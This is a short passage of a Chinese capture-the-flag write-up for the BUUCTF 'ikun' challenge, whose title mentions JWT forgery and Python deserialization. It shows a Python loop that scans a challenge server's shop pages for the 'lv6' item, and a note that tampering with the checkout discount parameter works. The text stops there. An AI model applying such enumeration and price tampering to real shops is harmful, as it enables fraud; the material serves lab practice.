BUUCTF 刷题ikun_bilibili应援团(JWT伪造、python反序列化)
一、获取lv6账号位置
import requests
target = "http://111.200.241.244:61777/shop?page=%d"
for i in range(500):
print(i)
res = requests.get(target%(i)).text
if "lv6.png" in res:
print(target%(i))
break
http://111.200.241.244:61777/shop?page=181
二、抓包结算页面
发现只有更改discount参数有效果,跳转到http://111.200.241.244:61777